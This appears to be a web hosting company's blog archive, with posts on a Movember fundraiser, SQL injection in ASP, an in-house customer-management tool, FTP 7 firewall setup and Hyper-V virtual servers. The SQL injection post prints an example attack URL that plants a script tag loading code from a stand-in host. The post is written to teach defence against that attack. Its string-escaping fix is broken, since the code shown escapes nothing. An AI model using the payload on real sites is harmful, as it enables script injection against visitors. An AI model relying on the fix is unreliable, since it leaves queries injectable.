You know those normally hygienic people who for some strange reason decide to throw it out the window once a year and grow a hideous moustache?
Well believe it or not they haven't gone mad, they are supporting Movember which aims to raise funds and awareness for men's health.
This month my staff are on the ball, setting up a campaign where 5% of every Web Hosting or HyperVPS account purchased in the month of November will go straight to the Movember Foundation.
That money will then go on to either the Prostate Cancer Foundation of Australia or beyondblue: the national depression initiative. Two worthy causes I think you'll agree.
"SQL Injection" has become an increasingly common way for hackers to attack web sites, but what is SQL Injection and what can web developers do to avoid it?
SQL injection involves manipulating the variables sent to a web page in order to place additional SQL queries within queries used as part of the web site code.
Take the following simple example using ASP:
szQuery = "Select * From myTable Where ID = " & Request("ID")
Because the Request("ID") variable isn't filtered or checked in any way, an attacker can manipulate the URL request string to insert any commands they like into the table.
So if they have a script at say http://testdomain.local/bad.js and the myTable has a column called "Description" which is used to display information on the page, an attacker could use the following:
"testpage.asp?ID=1;Update myTable set Description = '<script src="http://testdomain.local/bad.js"></script>' Where ID = 1"
THIS IS BAD
So how does one fix it?
The best approach is to not use request variables directly in SQL in the first place, but in ASP this is not always an easy option.
In ASP.NET however, the problem can be solved by using the SQLCommand.Parameters to add each variable that is needed in the query.
Then the SQL Query will look something like this:
Select * From myTable Where ID = @ID;
But if you need to quickly fix older code in ASP, then filtering each request variable manually is a reasonable approach.
(Though not completely fool proof)
szID = Request("ID")
szQuery = "Select * From myTable Where ID = '" & szID & "'"
The above will "escape" potentially dangerous characters such as ' and ; from the variable completely.
Note that the above is only helpful if the ID variable is a string.
If the variable is a known type other than a string (say Integer) then casting must be used to prevent nasty SQL from being inserted:
iID = CINT(Request("ID"))
szQuery = "Select * From myTable Where ID = " & iID
In the above example, if an attacker tries to insert something into ID, it will cause an error and refuse to run the query.
So there you have it, SQL Injection is easy to avoid once you know how.
If you've wondered why there haven't been any posts to our blog in the last few weeks then wonder no more!
I have been busy at work on the latest version of our customer management system codenamed "blackbriar" (see our blog entry about "Alcatraz" for what the system is all about)
The two key features of this release are:
We'll be releasing an IIS7 based Web Hosting service to the public soon, but in the mean time power users may be more interested in our new Hyper-V VPS service which comes with Windows Server 2008 and IIS7 as standard.
Alcatraz Island: a prison surrounded by water.
On the surface i’ll admit it doesn’t sound like such a great name to call a customer management system.
We were thinking more along the lines of the security aspects the name implies rather than the concept of our staff feeling imprisoned while using it!
Alcatraz or simply “Management Client” is the system our staff use to manage customer accounts on a daily basis.
Take a look at the screenshot below: (click to view full size)
What will be immediately obvious to anyone who has worked in the web hosting industry before is that Alcatraz is an actual program and not a web site.
Most if not all off-the-shelf hosting management systems (such as Plesk etc) are web based and this can significantly increase the time it takes for a staff member to attend to a query.
Alcatraz on the other hand is super fast!
Alcatraz was built from scratch to suit our unique way of doing things here at Studiocoast.
Some of the reasons why Alctraz is great:
If you’re a programmer you may be interested in how it all works behind the scenes:
So what does the future hold for Alctraz?
At the moment I am hard at work on version 3.0 codenamed Blackbriar.
It will feature native support for IIS7 and MySQL 5.0 plus much much more.
I hope this post has been educational. If you have any questions about “Alcatraz” feel free to post in the comments below.
Perhaps you are a customer and would like to see some new features in hostControl. I’m all ears!
Just a quick note on FTP 7, the new FTP server software for Windows Server 2008.
A guide I found on iis.net describes setting up passive port ranges and opening them up in the firewall one by one.
I have found an alternative method which I think is a lot easier to setup:
1. Open up Windows Firewall with Advanced Security from Administrative Tools
2. Right click Inbound Rules and select New Rule
3. Select the Custom Rule option and click next.
4. Select All Programs and then click Customize next to Services
5. Select Apply to this service and select from the list Microsoft FTP Service
6. For all the next steps simply click Next accepting the defaults.
7. For the name call it something like "Microsoft FTP Firewall Access"
8. Click Finish
Note: this rule allows access to any ports the FTP Service opens. This is usually port 21, and any passive ports it opens for client connections.
June 26 will forever be remembered in history as the day Microsoft released Hyper-V to the server masses.
Ok, well maybe it isn't THAT memorable but it is still a pretty important piece of software in the Windows Hosting arena.
Why? Well i'm glad you asked…
Hyper-V is a hypervisor-based virtualisation platform that allows multiple concurrent operating systems to share a single host computer.
Now while Virtual Private Server technology has been around for many years now in many forms, Hyper-V, like any hypervisor based technology, brings additional benefits to the table:
Both Intel and AMD provide technology to allow Hypervisor-aware operating systems more direct access to the CPU.
Previously, VPS software has had to emulate the processor in order to convince the operating system it has a CPU all to itself.
In an effort to get around the performance limitations in older technology, products such as Parallels Virtuozzo sub-divide
a single operating system instance to give the appearance of multiple separate servers.
This method of virtualisation has many limitations as it does not provide true isolation. A misbehaving program on one partition could potentially
access the memory of another and cause corruption or worse.
Hyper-V on the other hand will have none of those shenanigans. Each operating system instance is completely isolated and it is almost
impossible for one to interfere with another.
Hyper-V comes with many administrative tools that make managing virtual servers a whole lot easier for system admins such as myself.
We will be integrating many of these features into our hostControl control panel for end users to access.
Friendly product licensing from Microsoft??? It's true, Hyper-V licensing for virtual servers is simple.
One copy of the Windows Server 2008 Data Centre Edition license allows an unlimited amount of virtual servers on a single machine.
So what does this all mean for the end user then?
Purchasing a Hyper-V based virtual server from providers such as Studiocoast has the following benefits:
Install whatever you want, whenever you want with full Administrative access.
Reboot the server yourself into you're blue in the face if you want, it is all yours!
Each virtual server can have memory or disk space upgraded at the click of a button.
This allows you to purchase a server based on what you need now, all with a clear and easy upgrade path for the future.
A virtual server is much cheaper than a dedicated server and a whole lot more flexible to boot.
In the unlikely event of hardware failure, each virtual server can be quickly copied to a functioning server.
Virtual servers all use the same drivers regardless of the underlying server so hardware compatibility is never a problem.
So what are you waiting for? Check out our HyperVPS plans page.
It's been a long road to get here but the Studiocoast blog is finally online!
The Studiocoast team will be here to give you some insight into the workings of this humble Web Hosting provider.
We will also be offering some expert advice and tips shaped by the many challenges we have faced (and overcome) over the years.
Members of the team will each introduce themselves over the coming weeks as they find something to contribute!
I trust you will enjoy what we have to contribute to the blogosphere and hope you will find our posts useful.